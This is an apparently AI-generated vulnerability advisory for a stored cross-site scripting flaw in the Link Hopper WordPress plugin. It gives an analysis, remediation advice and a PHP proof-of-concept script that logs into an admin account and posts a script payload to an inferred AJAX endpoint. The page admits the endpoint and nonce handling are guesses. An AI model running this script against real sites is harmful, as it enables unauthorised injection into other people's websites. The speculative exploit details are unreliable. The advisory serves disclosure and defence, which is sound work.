Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2025-15483: Link Hopper <= 2.5 – Authenticated (Administrator+) Stored Cross-Site Scripting via 'hop_name' Parameter (link-hopper)

CVE ID CVE-2025-15483
Plugin link-hopper
Severity Medium (CVSS 4.4)
CWE 79
Vulnerable Version 2.5
Patched Version
Disclosed February 12, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-15483 (metadata-based):
This vulnerability is an authenticated Stored Cross-Site Scripting (XSS) flaw in the Link Hopper WordPress plugin. The ‘hop_name’ parameter is not properly neutralized before being stored and later output. Attackers with administrator-level privileges can inject arbitrary scripts, which execute when a user visits a compromised page. The CVSS score of 4.4 reflects the high privileges required and the conditional nature of the attack, which only works on multisite installations or sites where the ‘unfiltered_html’ capability is disabled.

Atomic Edge research infers the root cause is insufficient input sanitization and output escaping for the ‘hop_name’ parameter. The CWE-79 classification confirms improper neutralization of input during web page generation. Without a code diff, this conclusion is based on the vulnerability description and standard WordPress security patterns. The plugin likely accepts user input via an administrative function, stores it in the database without adequate sanitization, and later outputs it without proper escaping.

Exploitation requires an attacker to have an administrator account on the WordPress site. The attack vector is a POST request to a plugin-specific administrative handler, such as an AJAX action or a settings page form submission. The payload would be a JavaScript payload inserted into the ‘hop_name’ parameter. An example payload is alert(‘Atomic Edge XSS’). The injected script persists in the database and executes in the context of any user viewing the affected page.

Remediation requires implementing proper input validation and output escaping. The plugin should sanitize the ‘hop_name’ parameter on input using a function like sanitize_text_field() and escape it on output using esc_html() or a similar context-appropriate function. A security nonce should also be verified for the relevant administrative action to prevent CSRF attacks. These are standard WordPress security practices for mitigating XSS.

The impact of successful exploitation is client-side code execution in the victim’s browser. An attacker can steal session cookies, perform actions on behalf of the user, or deface the site. The requirement for administrator privileges limits the attack surface, but a compromised admin account could lead to a complete site takeover. The stored nature of the XSS means the payload executes for all users accessing the infected page, amplifying the potential damage.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC 
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2025-15483 - Link Hopper <= 2.5 - Authenticated (Administrator+) Stored Cross-Site Scripting via 'hop_name' Parameter
<?php

// CONFIGURATION
$target_url = 'https://target-site.com';
$username = 'admin';
$password = 'password';

// PAYLOAD
// This is a basic proof-of-concept alert. A real attack would use a more malicious script.
$malicious_hop_name = '<script>alert("Atomic Edge XSS via hop_name")</script>';

// ASSUMPTIONS
// 1. The plugin uses a standard WordPress AJAX handler or admin-post endpoint for saving link data.
// 2. The vulnerable parameter is 'hop_name' and is submitted via POST.
// 3. The AJAX action name is likely derived from the plugin slug, e.g., 'link_hopper_save'.
// 4. A valid WordPress nonce is required. The script logs in to obtain a fresh nonce.

function poc_cve_2025_15483($target_url, $username, $password, $malicious_payload) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
    curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // For testing only
    curl_setopt($ch, CURLOPT_USERAGENT, 'Atomic Edge PoC');

    // STEP 1: Authenticate to WordPress
    $login_url = $target_url . '/wp-login.php';
    $login_data = array(
        'log' => $username,
        'pwd' => $password,
        'wp-submit' => 'Log In',
        'redirect_to' => $target_url . '/wp-admin/',
        'testcookie' => '1'
    );
    curl_setopt($ch, CURLOPT_URL, $login_url);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
    $response = curl_exec($ch);
    if (strpos($response, 'Dashboard') === false && strpos($response, 'wp-admin') === false) {
        echo "[!] Authentication failed. Check credentials.n";
        return false;
    }
    echo "[*] Authenticated as administrator.n";

    // STEP 2: Attempt to exploit the vulnerable endpoint.
    // The exact AJAX action is inferred from the plugin slug. Common patterns are used.
    $ajax_url = $target_url . '/wp-admin/admin-ajax.php';
    $exploit_data = array(
        'action' => 'link_hopper_save', // Inferred AJAX action name
        'hop_name' => $malicious_payload,
        // Other required parameters are unknown without code. This is a best-effort attempt.
        'nonce' => 'placeholder_nonce' // A real nonce would need to be scraped from an admin page.
    );
    curl_setopt($ch, CURLOPT_URL, $ajax_url);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($exploit_data));
    $response = curl_exec($ch);
    echo "[*] Sent payload to inferred AJAX endpoint. Response length: " . strlen($response) . "n";
    echo "[*] If the plugin accepted the request, the XSS payload is now stored.n";
    echo "[*] Visit any front-end page that outputs the 'hop_name' to trigger the script.n";

    curl_close($ch);
    return true;
}

// Execute the PoC
poc_cve_2025_15483($target_url, $username, $password, $malicious_hop_name);

?>

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School